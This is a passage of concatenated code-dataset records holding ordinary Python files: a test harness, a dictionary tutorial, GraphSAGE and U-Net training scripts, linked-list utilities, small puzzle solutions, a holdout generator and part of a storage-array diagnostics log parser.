4, 5, 6, 7, 8, 0])\r\n solve([1, 2, 3, 4, 5, 6, 7, 0, 8])\r\n\r\n endtime = time.time()\r\n\r\n sys.stdout.close()\r\n sys.stdout = backup_stdout\r\n live = open('test.txt', 'r')\r\n if ref_version == \"new\":\r\n ref = open('ref.txt', 'r')\r\n else:\r\n ref = open('badref.txt', 'r')\r\n\r\n live_l = live.readlines()\r\n ref_l = ref.readlines()\r\n\r\n live.close()\r\n ref.close()\r\n\r\n line_no = 0\r\n for l, r in zip(live_l, ref_l):\r\n line_no += 1\r\n if not l == r:\r\n print(\"Yours: \" + l.strip())\r\n print(\"Ref: \" + r.strip())\r\n print(\"Line number: \" + str(line_no))\r\n print(\"\\n\")\r\n if not live_l:\r\n print(\"Did you... print anything? 
Check test.txt\")\r\n elif len(live_l) < len(ref_l):\r\n print(\"Looks like you didn't print enough stuff\")\r\n elif len(live_l) > len(ref_l):\r\n print(\"Looks like you printed too much stuff\")\r\n print(\"If the time below is all you see, your code is good.\")\r\n\r\n print(\"Elapsed time was: \" + str((endtime - starttime)) + \"s\")\r\n print(\"Ref elapsed time: 0.62s\")","sub_path":"A9/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"559803263","text":"# example\ninstructor = {\n \"name\": \"Colt\",\n \"owns_dog\": True,\n \"num_courses\": 4,\n \"favorite_language\": \"Python\",\n \"is_hilarious\": False,\n 44: \"My favorite number!\"\n}\n\n# Another way\nanother_dictionary = dict(key = 'value')\nanother_dictionary # {'key': 'value'}\n\n# accessing Data\ninstructor['name'] # 'Colt\ninstructor['thing'] # KeyError\n\n# How to iterate dictionaries\nfor value in instructor.values():\n print(value)\n# \"Colt\"\n# True\n# 4\n# etc....\n\nfor v in instructor.keys():\n print(v)\n\n# name\n# owns_dog\n# num_courses\n# etc...\n\n# when you want to access both\n\nfor key,value in instructor.items():\n print(key,value)\n\n# name \"Colt\"\n# owns_dog True\n# num_courses 4\n# favorite_language \"Python\"\n# is_hilarious False\n# 44 \"My favorite number!\"\n\n# how to test if a key exists in a dictionary \n'name' in instructor # True\n'awesome' in instructor # False\n\n# test for values\n\"Colt\" in instructor.values() # True\n'Nope!' in instructor.values() # False","sub_path":"14_dictionaries/dictionaries.py","file_name":"dictionaries.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"524156621","text":"from Aggregator import Aggregator\nfrom GraphSAGE import GraphSAGE\nfrom collections import defaultdict, namedtuple\nimport torch.nn as nn\nimport torch\nimport numpy as np\nimport numpy as np\nimport time\nimport random\nfrom sklearn.metrics import f1_score\nfrom torch.autograd import Variable\n\n\n# SAGEInfo is a namedtuple that specifies the parameters \n# of the recursive GraphSAGE layers\nSAGEInfo = namedtuple(\"SAGEInfo\",\n ['layer_name', # name of the layer (to get feature embedding etc.)\n 'neigh_sampler', # callable neigh_sampler constructor\n 'num_samples',\n 'input_dim',\n 'output_dim' # the output (i.e., hidden) dimension\n ])\n\nclass SupervisedGraphSage(nn.Module):\n\n def __init__(self, num_classes, enc):\n super(SupervisedGraphSage, self).__init__()\n self.enc = enc\n self.xent = nn.CrossEntropyLoss()\n\n self.weight = nn.Parameter(torch.FloatTensor(num_classes, enc.embed_dim))\n nn.init.xavier_uniform_(self.weight)\n\n def forward(self, nodes):\n embeds = self.enc(nodes)\n scores = self.weight.mm(embeds.t())\n\n return scores.t()\n\n def loss(self, nodes, labels):\n scores = self.forward(nodes)\n return self.xent(scores, labels.squeeze())\n\ndef load_cora():\n num_nodes = 2708\n num_feats = 1433\n feat_data = np.zeros((num_nodes + 1, num_feats))\n labels = np.empty((num_nodes,1), dtype=np.int64)\n node_map = {}\n label_map = {}\n with open(\"GraphSAGE-master/cora/cora.content\") as fp:\n for i,line in enumerate(fp):\n info = line.strip().split()\n feat_data[i,:] = list(map(float, info[1:-1]))\n node_map[info[0]] = i\n if not info[-1] in label_map:\n label_map[info[-1]] = len(label_map)\n labels[i] = label_map[info[-1]]\n feat_data[-1,:]= [0 for i in 
range(num_feats)]\n\n    adj_lists = defaultdict(set)\n    with open(\"GraphSAGE-master/cora/cora.cites\") as fp:\n        for i,line in enumerate(fp):\n            info = line.strip().split()\n            paper1 = node_map[info[0]]\n            paper2 = node_map[info[1]]\n            adj_lists[paper1].add(paper2)\n            adj_lists[paper2].add(paper1)\n    return feat_data, labels, adj_lists\n\ndef run():\n    np.random.seed(1)\n    random.seed(1)\n    num_nodes = 2708\n    feat_dim = 1433\n    hidden_dim = 128\n    feat_data, labels, adj_lists = load_cora()\n\n\n    layer_infos = [SAGEInfo(\"node\", None, 10, feat_dim, hidden_dim),\n                   SAGEInfo(\"node\", None, 10, hidden_dim, hidden_dim)]\n    sage = GraphSAGE(feat_data, num_nodes, layer_infos, 0, adj_lists)\n    # sage = GraphSAGE(feat_data, num_nodes, feat_dim, layer_infos, adj_lists)\n    graphsage = SupervisedGraphSage(7, sage)\n    graphsage.cuda()\n    rand_indices = np.random.permutation(num_nodes)\n    test = rand_indices[:1000]\n    val = rand_indices[1000:1500]\n    train = list(rand_indices[1500:])\n\n    optimizer = torch.optim.SGD(filter(lambda p : p.requires_grad, graphsage.parameters()), lr=0.7)\n    times = []\n    for batch in range(100):\n        batch_nodes = train[:256]\n        random.shuffle(train)\n        start_time = time.time()\n        optimizer.zero_grad()\n        loss = graphsage.loss(batch_nodes,\n                Variable(torch.LongTensor(labels[np.array(batch_nodes)])))\n        loss.backward()\n        optimizer.step()\n        end_time = time.time()\n        times.append(end_time-start_time)\n        print(batch, loss.data)\n        # print(batch, loss.data[0])\n\n    val_output = graphsage.forward(val)\n    print (\"Validation F1:\", f1_score(labels[val], val_output.data.numpy().argmax(axis=1), average=\"micro\"))\n    print (\"Average batch time:\", np.mean(times))\n\nif __name__ == \"__main__\":\n    run()","sub_path":"GCN/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"552033682","text":"#This program implements linked list functions without an encapsulating linked list class\n\nclass Node:\n    def __init__(self, data = None, next = None):\n        self.data = data\n        self.next = next\n\n#Adding to front of list\ndef add_to_front(data, head):\n    return Node(data, head)\n\n#Printing all elements of list\n# Iterative\n\ndef print_list(head):\n    while head != None:\n        print(head.data, end=\" \")\n        head = head.next\n    print(\"\")\n    \n# Recursive\n\ndef print_lis_rec(head):\n    if head != None:\n        print(head.data, end=\" \")\n        print_lis_rec(head.next)\n    else:\n        print(\"\")\n\n#Removing from front of list\ndef remove_from_front(head):\n    if head == None:\n        return None\n    else:\n        return head.next\n\n#Adding to back of list\ndef add_to_back(data, head):\n    if head == None:\n        return Node(data, None)\n    \n    head.next = add_to_back(data, head.next)\n    return head\n\n#Removing from back\ndef remove_from_back(head):\n    if head == None or head.next == None:\n        return None\n    \n    head.next = remove_from_back(head.next)\n\n    return head\n\n#Recursive operations for list\ndef get_list_length_iterative(head):\n    size_count = 0\n\n    while head != None:\n        size_count += 1\n        head = head.next\n    \n    return size_count\n\ndef get_lis_length_recursive(head):\n    if head == None:\n        return 0\n    else:\n        return 1 + get_lis_length_recursive(head.next)\n\ndef get_sum_of_lis(head):\n    if head == None:\n        return 0\n    elif head.next == None:\n        return head.data\n    else:\n        return head.data + get_sum_of_lis(head.next)\n\n#Insert an element in its rightful place in a sorted list\n\ndef insert_ordered_iterative(head, data):\n    if head == None or head.data >= data:\n        return 
Node(data, head)\n    \n    curr_node = head\n\n    # guard on curr_node.next so inserting the largest value does not dereference None\n    while curr_node.next != None and curr_node.next.data < data:\n        curr_node = curr_node.next\n    \n    curr_node.next = Node(data, curr_node.next)\n\n    return head\n\ndef insert_ordered_recursive(head, data):\n    if head == None or head.data > data:\n        return Node(data, head)\n\n    head.next = insert_ordered_recursive(head.next, data)\n    return head\n\n#Reverse a given list\n\ndef reverse_lis(head):\n    if head == None or head.next == None:\n        return head\n    curr_node = reverse_lis(head.next)\n    head.next.next = head\n    head.next = None\n    return curr_node\n\n#Merge two lists\n\ndef merge_lis(head1, head2):\n    if head1 == None:\n        return head2\n    elif head2 == None:\n        return head1\n    elif head1.data < head2.data:\n        head1.next = merge_lis(head1.next, head2)\n        return head1\n    else:\n        head2.next = merge_lis(head1, head2.next)\n        return head2\n    \n#Merge sort a list\n\ndef merge_sort(head):\n    if head == None or head.next == None:\n        return head\n\n    node_half = head\n    node = head.next\n\n    while node != None and node.next != None:\n        node_half = node_half.next\n        node = node.next.next\n    \n    node = node_half.next\n    node_half.next = None\n\n    return merge_lis(merge_sort(head), merge_sort(node))\n\n#Implementation of stack and queue with Node class\nclass Stack:\n    def __init__(self):\n        self.top = None\n        self.size = 0\n    \n    def push(self, data):\n        self.top = Node(data, self.top)\n        self.size += 1\n    \n    def pop(self):\n        if self.top == None:\n            return None\n        \n        ret_val = self.top.data\n        self.top = self.top.next\n        self.size -= 1\n\n        return ret_val\n    \n    def get_size(self):\n        return self.size\n    \n    def __str__(self):\n        ret_str = \"\"\n\n        curr_node = self.top\n\n        while curr_node != None:\n            ret_str += str(curr_node.data) + \" \"\n            curr_node = curr_node.next\n        \n        return ret_str\n\nclass Queue:\n    def __init__(self):\n        self.head = None\n        self.tail = None\n        self.size = 0\n    \n    def push_back(self, data):\n        if self.head == None:\n            self.head = self.tail = Node(data, None)\n        else:\n            self.tail.next = Node(data, None)\n            self.tail = self.tail.next\n        \n        self.size += 1\n    \n    def pop_front(self):\n        if self.head == None:\n            return None\n        else:\n            ret_val = self.head.data\n            self.head = self.head.next\n\n            if self.head == None:\n                self.tail = self.head\n\n            self.size -= 1\n            return ret_val\n    \n    def get_size(self):\n        return self.size\n    \n    def __str__(self):\n        ret_str = \"\"\n        curr_node = self.head\n\n        while curr_node != None:\n            ret_str += str(curr_node.data) + \" \"\n            curr_node = curr_node.next\n        \n        return ret_str\n    \nif __name__ == \"__main__\":\n    head = Node(1, Node(2, Node(3, Node(4, Node(5, None)))))\n\n    print_list(head)\n\n    print_list(add_to_front(7, head))\n\n    print_list(head)\n\n    print_lis_rec(head)\n\n    print_lis_rec(remove_from_front(head))\n\n    print_lis_rec(add_to_back(6, head))\n\n    print_lis_rec(remove_from_back(head))\n\n    print(get_list_length_iterative(head))\n    print(get_lis_length_recursive(head))\n\n    print(get_sum_of_lis(head))\n\n    insert_ordered_recursive(head, 8)\n\n    print_lis_rec(head)\n\n    print_lis_rec(reverse_lis(head))\n\n    head2 = Node(5, Node(7, Node(23, Node(25, None))))\n\n    merge_lis(head, head2)\n\n    print_lis_rec(merge_sort(head))\n\n    stack = Stack()\n\n    for i in range(10):\n        stack.push(i)\n    \n    print(stack)\n\n    stack.pop()\n\n    print(stack)\n\n    print(stack.get_size())\n\n    queue = Queue()\n\n    for i in range(10):\n        queue.push_back(i)\n    \n    print(queue)\n\n    queue.pop_front()\n\n    print(queue)\n\n
    print(queue.get_size())\n\n\n\n","sub_path":"nodes_and_linkedlis_no_encap.py","file_name":"nodes_and_linkedlis_no_encap.py","file_ext":"py","file_size_in_byte":5740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"61168219","text":"A,B,K=map(int,input().split())\nflag=True\nfor i in range(K):\n    if flag:\n        flag=False\n        A=A//2\n        B+=A\n    else:\n        flag=True\n        B=B//2\n        A+=B\nprint(A,B)","sub_path":"Python_codes/p03228/s957976261.py","file_name":"s957976261.py","file_ext":"py","file_size_in_byte":158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"364915338","text":"class Solution:\n    def smallestSubsequence(self, text: str) -> str:\n        lastSeen = {}\n        \n        for i, ch in enumerate(text):\n            lastSeen[ch] = i\n        \n        stack = []\n        \n        for i, ch in enumerate(text):\n            if ch in stack:\n                continue\n            # While stack is not empty and stack top is a higher character and will occur later in the string\n            while stack and stack[-1] > ch and lastSeen[stack[-1]] > i:\n                stack.pop()\n            stack.append(ch)\n        \n        return ''.join(stack)","sub_path":"leetcode/Problems/1081--Smallest-Subsequence-of-Distinct-Characters-Medium.py","file_name":"1081--Smallest-Subsequence-of-Distinct-Characters-Medium.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"524432074","text":"from typing import Callable, List, Tuple, Dict\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.utils import shuffle\nimport numpy as np\nimport pandas as pd\nfrom .utils import odd_even_split\n\n\ndef balanced_random_holdout(test_size: float, random_state: int, hyper_parameters: Dict) -> [Callable, str, Tuple[float, int]]:\n    \"\"\"Return a function to create a holdout with the given test_size and random_state, and the path where to store it.\n    test_size:float, float from 0 to 1, representing how many datapoints should be reserved to the test set.\n    random_state:int, random state to reproduce experiment.\n    hyper_parameters:Dict, additional hyper-parameters used to create the holdout.\n    \"\"\"\n    def holdout(dataset: Tuple):\n        \"\"\"\n        dataset, the dataset to split. 
It must finish with an array containing the classes.\n        \"\"\"\n        results = []\n        for row in np.array([\n            train_test_split(\n                *[\n                    d[dataset[-1] == label]\n                    for d in dataset\n                ],\n                test_size=test_size,\n                random_state=random_state\n            )\n            for label in np.unique(dataset[-1])\n        ]).T:\n            if all([\n                isinstance(d, pd.DataFrame)\n                for d in row\n            ]):\n                results.append(pd.concat(row))\n            else:\n                results.append(np.concatenate(row))\n\n        train, test = odd_even_split(results)\n        train = shuffle(*train, random_state=random_state)\n        test = shuffle(*test, random_state=random_state)\n        return sum(\n            ((e1, e2) for e1, e2 in zip(train, test)), tuple()\n        )\n\n    return holdout, {\n        \"test_size\": test_size,\n        \"random_state\": random_state\n    }\n\n\ndef balanced_random_holdouts(test_sizes: List[float], quantities: List[int], random_state: int = 42, hyper_parameters: Dict = None) -> List[Tuple[Callable, str, List]]:\n    \"\"\"Return a generator of functions to create holdouts with the given test_sizes.\n    test_sizes:List[float], floats from 0 to 1, representing how many datapoints should be reserved to the test set.\n    quantities:List[int], quantities of holdouts for each test_size.\n    random_state:int=42, random state to reproduce experiment.\n    hyper_parameters:Dict, additional hyper-parameters used to create the holdout.\n    \"\"\"\n    if len(test_sizes) > 1:\n        return [\n            (\n                *balanced_random_holdout(test_sizes[0], random_state+i, hyper_parameters),\n                balanced_random_holdouts(\n                    test_sizes[1:], quantities[1:], random_state+i, hyper_parameters)\n            ) for i in range(quantities[0])\n        ]\n    return [(*balanced_random_holdout(test_sizes[0], random_state+i, hyper_parameters), None) for i in range(quantities[0])]\n","sub_path":"holdouts_generator/balanced_random_holdouts.py","file_name":"balanced_random_holdouts.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"427225607","text":"import tensorflow as tf\nimport sys\nsys.path.append('../')\nimport os\nimport tools.development_kit as dk\nfrom tools.loss import get_loss\nfrom data_process.preprocess import augmentImages\nimport time\nfrom data_process.use_seg_tfrecord import create_inputs_seg_hand as create_inputs\nfrom choice import cfg\nfrom choice import model\nfrom choice import is_train\nfrom choice import restore_model\n\n\n############################### cfg ####################################\nckpt =cfg.ckpt\nbatch_size = cfg.batch_size\ninput_shape = cfg.input_shape\nlabels_shape = cfg.labels_shape\nlabels_shape_vec = cfg.labels_shape_vec\nepoch = cfg.epoch\ntrain_data_number = cfg.train_data_number\ntest_data_number = cfg.test_data_number\nsave_epoch_n = cfg.save_epoch_n  # save a checkpoint every this many epochs\nlogdir = cfg.logdir\n############################## end ########################################\n\nn_batch_train = int(train_data_number //batch_size)\nos.makedirs(ckpt,exist_ok=True)\nsession_config = dk.set_gpu()\n\nif __name__== '__main__':\n    with tf.Session(config = session_config) as sess:\n        # input pipeline entry point\n        train_x, train_y = create_inputs(is_train)\n        # train_y = tf.reshape(train_y,labels_shape)\n        x = tf.placeholder(tf.float32, shape=input_shape)\n        y = tf.placeholder(tf.float32, shape=labels_shape)\n        # build the network and the prediction\n        prediction = model(images= x, is_train =is_train,size= input_shape,l2_reg =0.0001 )\n        # compute the loss\n        # loss = dk.cross_entropy_loss(prediction, y)\n        the_loss = get_loss('bce_dice')\n        loss = the_loss(y, prediction,labels_shape_vec)\n        # set up the optimizer\n        global_step, train_step = 
dk.set_optimizer(num_batches_per_epoch=n_batch_train, loss=loss)\n        # compute dice_hard; accuracy is not a suitable metric here\n        dice_hard = dk.dice_hard(y, prediction, threshold=0.5, axis=[1, 2, 3], smooth=1e-5)\n        # accuracy = dk.get_acc(prediction, y)\n        # initialize variables\n        coord, threads = dk.init_variables_and_start_thread(sess)\n        # set up training summaries\n        summary_dict = {'loss':loss,'dice_hard':dice_hard}\n        summary_writer, summary_op = dk.set_summary(sess,logdir,summary_dict)\n        # restore the model\n        saver,start_epoch = dk.restore_model(sess, ckpt, restore_model=restore_model)\n        # show the parameter count\n        dk.show_parament_numbers()\n        # if restoring a model, recompute start_epoch and continue\n        # start_epoch = 0\n        # if restore_model:\n        #     step = sess.run(global_step)\n        #     start_epoch = int(step/n_batch_train/save_epoch_n)*save_epoch_n\n        # training loop\n        total_step = n_batch_train * epoch\n        for epoch_n in range(start_epoch,epoch):\n            since = time.time()\n            for n_batch in range(n_batch_train):\n                batch_x, batch_y = sess.run([train_x, train_y])\n                ########################## data augmentation ###################################\n                batch_x = batch_x / 255.0  # normalize; this line reduced the loss by tens of times\n                batch_x, batch_y = augmentImages(batch_x, batch_y)\n                ########################## end #######################################\n                # train one step\n                _, loss_value, dice_hard_value, summary_str, step = sess.run(\n                    [train_step, loss, dice_hard, summary_op, global_step],\n                    feed_dict={x: batch_x, y: batch_y})\n                # display the batch results\n                dk.print_effect_message(epoch_n,n_batch,n_batch_train,loss_value,dice_hard_value)\n                # save the summary\n                if (step + 1) % 20 == 0:\n                    summary_writer.add_summary(summary_str, step)\n\n            # show progress and elapsed time\n            seconds_mean = (time.time() - since) / n_batch_train\n            dk.print_progress_and_time_massge(seconds_mean,step,total_step)\n            # save the model\n            if (((epoch_n + 1) % save_epoch_n)) == 0:\n                print('epoch_n :{} saving model.......'.format(epoch_n))\n                saver.save(sess,os.path.join(ckpt,'model_{}.ckpt'.format(epoch_n)), global_step=global_step)\n\n        dk.stop_threads(coord,threads)","sub_path":"my_seg_tf/v10_segcap_128_128/history/train_unet.py","file_name":"train_unet.py","file_ext":"py","file_size_in_byte":4184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"169735944","text":"\"\"\"Contains parser definitions on how to extract data from the frequentdiagnostics log.\"\"\"\n\nimport logging\n\nfrom collections import defaultdict\n\ntry:\n    # pylint: disable=redefined-builtin\n    from itertools import izip as zip\nexcept ImportError:\n    # This only exists in Python 2.\n    pass\n\nimport six\nimport ujson\n\n# pylint: disable=unused-import\ntry:\n    from typing import Any\n    from typing import Dict\n    from typing import List\n    from typing import Optional\n    from typing import Tuple\nexcept ImportError:\n    pass\n\nfrom photon.lib import parser_utils\nfrom photon.lib import dict_utils\nfrom photon.lib import format_utils\nfrom photon.lib import time_utils\n\nLOGGER = logging.getLogger(__name__)\n# pylint: disable=too-few-public-methods, too-many-public-methods, invalid-name, line-too-long\n\n\nclass FDiagFormData(parser_utils.FormData):\n    \"\"\"Forms used by the FDiagnosticsParser.\"\"\"\n\n    diagnostics = parser_utils.SimpleTextForm(\n        text_to_match='] Diagnostics: {',\n        regexes={},\n    )\n\n\nclass FDiagLogData(parser_utils.LogData):\n    \"\"\"Manage information about a piece of data from the logs.\"\"\"\n\n    def __init__(self, needed_forms):\n        # type: (List[Any]) -> None\n        \"\"\"Create an object to track needed forms.\"\"\"\n        fdiag_forms = FDiagFormData()\n        super(FDiagLogData, self).__init__({form: fdiag_forms[form] for form in 
needed_forms})\n\n\nclass FDiagnosticsParser(parser_utils.ParallelLogParser):\n \"\"\"Defines all fdiag data parsing functions.\"\"\"\n forms = FDiagFormData()\n _fields = {\n 'actual_system_space',\n 'array_id',\n 'array_name',\n 'cap_for_hidden',\n 'capacity',\n 'controller_num',\n 'controller_model',\n 'controller_model_local',\n 'controller_serial',\n 'copyout_error_extents',\n 'data_reduction',\n 'domain_name',\n 'eradicated_vol_phys',\n 'fdiags',\n 'fdiags_unflattened',\n 'is_primary',\n 'live_physical_space',\n 'local_time',\n 'logical_discrepancy',\n 'newly_written_space',\n 'num_shelves',\n 'pgroup_settings',\n 'pgroup_snaps',\n 'physical_discrepancy',\n 'physical_space',\n 'pslun_names',\n 'purealert_list',\n 'pureapp_list',\n 'puredb_list_drives',\n 'puredb_list_job',\n 'puredrive_list',\n 'purehw_list',\n 'puremessage_list_audit',\n 'purepod_list_array',\n 'purity_version',\n 'reclaimable_space',\n 'replbond_info',\n 'reported_pyramid',\n 'reported_raid',\n 'san_targets',\n 'sas_port_info',\n 'serials',\n 'shared_space',\n 'snapshot_space',\n 'ssd_capacity',\n 'ssd_mapped',\n 'system_space',\n 'thin_provisioning',\n 'total_reduction',\n 'triage_error',\n 'unknown_space',\n 'unreachable_extent_phys',\n 'unreported_pyramid',\n 'unreported_raid',\n 'unreported_ratio',\n 'unreported_space',\n 'vector_space',\n 'visible_system_space',\n 'volume_space',\n }\n fields = {field: FDiagLogData(['diagnostics']) for field in _fields}\n\n def _pull_value(self, dict_map):\n # type: (List[str]) -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Delve into a multi-level fdiags dict to get a particular nested sub-value.\"\"\"\n fdiag_values = []\n for timestamp, fdiags in self.get_field('fdiags'):\n fdiags_tree = dict_utils.DictTree(fdiags)\n try:\n value = fdiags_tree.get_branch_value(dict_map)\n except KeyError:\n # The key mapping does not exist within this dict_tree.\n value = None\n fdiag_values.append((timestamp, value))\n return sorted(fdiag_values)\n\n def get_array_id(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for array_id.\"\"\"\n results = []\n net_ids = self._pull_value(['controller.info', 'net_array_id'])\n fc_ids = self._pull_value(['controller.info', 'fc_array_id'])\n iscsi_ids = self._pull_value(['controller.info', 'iscsi_array_id'])\n # Array ID is composed of: 'net_id-fc_id-iscsi_id'\n for index, value_tuple in enumerate(net_ids):\n timestamp = value_tuple[0]\n if not value_tuple[1]:\n results.append((timestamp, value_tuple[1]))\n continue\n net_id = str(value_tuple[1])\n fc_id = str(fc_ids[index][1])\n iscsi_id = str(iscsi_ids[index][1])\n # Append the tuple: (timestamp, array_id)\n results.append((timestamp, '-'.join([net_id, fc_id, iscsi_id])))\n return results\n\n def get_array_name(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for array_name.\"\"\"\n return self._pull_value(['controller.info', 'array_name'])\n\n def get_actual_system_space(self):\n # type: () -> List[Tuple[time_utils.Timestamp, int]]\n \"\"\"Parse all fdiags for actual_system_space space.\"\"\"\n return self._pull_value(['puredb.dump.health', 'space.actual_system_space', 'value'])\n\n def get_cap_for_hidden(self):\n # type: () -> List[Tuple[time_utils.Timestamp, int]]\n \"\"\"Parse all fdiags for cap_for_hidden space.\"\"\"\n return self._pull_value(['puredb.dump.health', 'space.cap_for_hidden', 'value'])\n\n def get_capacity(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for 
capacity.\"\"\"\n return self._pull_value(['purearray.list.space', 'capacity'])\n\n def get_controller_num(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for ct_num.\"\"\"\n return self._pull_value(['controller.info', 'controller_name'])\n\n def get_controller_model(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for controller_model to mimic diagnostics.log.\"\"\"\n # Expected output:\n # {'Model': ['FA-420', 'FA-420'], 'Name': ['CT0', 'CT1']}\n ct_model = []\n for timestamp, ctlr_info in self._pull_value(['purearray.list.controller']):\n model_dict = {\n 'Model': [],\n 'Name': [],\n }\n for ct_num, ct_info in six.iteritems(ctlr_info):\n model_dict['Model'].append(ct_info['model'])\n model_dict['Name'].append(ct_num)\n ct_model.append((timestamp, model_dict))\n return ct_model\n\n def get_controller_model_local(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for ct_model from the controller the log came from.\"\"\"\n model_idents = {\n 'beta medium': 'FA-300',\n 'HS-1235T-ATX': 'FA-300',\n 'gamma_minus medium': 'FA-405',\n '0JP31P': 'FA-420',\n 'gamma medium': 'FA-420',\n 'gamma_plus medium': 'FA-450',\n 'platinum_sas_a small': 'FA-m20',\n 'platinum_sas_a medium': 'FA-m50',\n 'platinum_sas_a big': 'FA-m70',\n 'platinum_sas_b tiny': 'FA-m10r2',\n 'platinum_sas_b small': 'FA-m20r2',\n 'platinum_sas_b medium': 'FA-m50r2',\n 'platinum_sas_b big': 'FA-m70r2',\n 'platinum_sas_b huge': 'FA-m70r2',\n }\n ct_model = []\n for timestamp, model in self._pull_value(['controller.info', 'controller_model']):\n if not model:\n ct_model.append((timestamp, model))\n continue\n if isinstance(model, list):\n # The lists are generally formatted like this\n # 'controller_model': ['gamma', 'medium']\n model = ' '.join(model)\n # We need to translate the model type we got from CA to the standard FA-XXX name\n if model in model_idents:\n model = model_idents[model]\n ct_model.append((timestamp, model))\n return ct_model\n\n def get_controller_serial(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for ct_serial.\"\"\"\n return self._pull_value(['controller.info', 'controller_sn'])\n\n def get_copyout_error_extents(self):\n # type: () -> List[Tuple[time_utils.Timestamp, str]]\n \"\"\"Parse all fdiags for copyout_error_extents space.\"\"\"\n values = self._pull_value(['puredb.dump.health', 'space.copyout_error_extents', 'value'])\n results = []\n # These are a count so we need a string not an int.\n for timestamp, value in values:\n if value:\n value = str(value)\n results.append((timestamp, value))\n return results\n\n def get_data_reduction(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for data_reduction.\"\"\"\n return self._pull_value(['purearray.list.space', 'data_reduction'])\n\n def get_domain_name(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for domain_name.\"\"\"\n return self._pull_value(['controller.info', 'sender_domain'])\n\n def get_eradicated_vol_phys(self):\n # type: () -> List[Tuple[time_utils.Timestamp, int]]\n \"\"\"Parse all fdiags for eradicated_vol_phys space.\"\"\"\n return self._pull_value(['puredb.dump.health', 'space.eradicated_vol_phys', 'value'])\n\n def get_fdiags(self):\n # type: () -> List[Tuple[Any, Dict[str, Any]]]\n \"\"\"Flatten the frequent diagnostics contents.\"\"\"\n parsed = []\n for timestamp, fdiags in self.get_fdiags_unflattened():\n # 
Flatten the contents of the JSON blob for easier navigation.\n            parsed.append((timestamp, _flatten_json_section(fdiags)))\n        return parsed\n\n    def get_fdiags_unflattened(self):\n        # type: () -> List[Tuple[Any, Dict[str, Any]]]\n        \"\"\"Parse the frequent diagnostics contents.\"\"\"\n        parsed = []\n        for diag_line in self.get_form_lines('diagnostics'):\n            time_str, contents = diag_line.split(' [monitord:WARNING] Diagnostics: ', 1)\n            timestamp = time_utils.Timestamp(time_str)\n            json_blob = ujson.loads(contents, precise_float=True)\n            parsed.append((timestamp, json_blob))\n        return parsed\n\n    def get_is_primary(self):\n        # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n        \"\"\"Parse all fdiags for is_primary.\"\"\"\n        return self._pull_value(['controller.info', 'is_primary'])\n\n    def get_live_physical_space(self):\n        # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n        \"\"\"Parse all fdiags for live physical space.\"\"\"\n        return self._pull_value(['puredb.dump.health', 'space.live_physical', 'value'])\n\n    def get_local_time(self):\n        # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n        \"\"\"Parse all fdiags for local_time.\"\"\"\n        return self._pull_value(['controller.info', 'local_time'])\n\n    def get_logical_discrepancy(self):\n        # type: () -> List[Tuple[time_utils.Timestamp, int]]\n        \"\"\"Parse all fdiags for logical_discrepancy space.\"\"\"\n        return self._pull_value(['puredb.dump.health', 'space.logical_discrepancy', 'value'])\n\n    def get_newly_written_space(self):\n        # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n        \"\"\"Parse all fdiags for newly written space.\"\"\"\n        return self._pull_value(['puredb.dump.health', 'space.space_newly_written', 'value'])\n\n    def get_num_shelves(self):\n        # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n        \"\"\"Parse all fdiags for num_shelves.\"\"\"\n        hw_parts = []\n        for timestamp, parts in self._pull_value(['purehw.list']):\n            if not parts:\n                hw_parts.append((timestamp, parts))\n                continue\n            num_parts = len([part for part in six.itervalues(parts) if part['type'] == 'storage_shelf'])\n            hw_parts.append((timestamp, num_parts))\n        return hw_parts\n\n    def get_pgroup_settings(self):\n        # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n        \"\"\"Parse all fdiags for pgroup_settings.\"\"\"\n        settings = []\n        results = self._pull_value(['purepgroup.list.schedule'])\n        for timestamp, pgroups in results:\n            if not pgroups:\n                settings.append((timestamp, pgroups))\n                continue\n            pgroup_settings = {}\n            for pgroup_name, pgroup in six.iteritems(pgroups):\n                pgroup_settings[pgroup_name] = pgroup\n            settings.append((timestamp, pgroup_settings))\n        return settings\n\n    def get_pgroup_snaps(self):\n        # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n        \"\"\"Parse all fdiags for pgroup snapshot information.\"\"\"\n        return self._pull_value(['purepgroup.list.snap'])\n\n    def get_physical_discrepancy(self):\n        # type: () -> List[Tuple[time_utils.Timestamp, 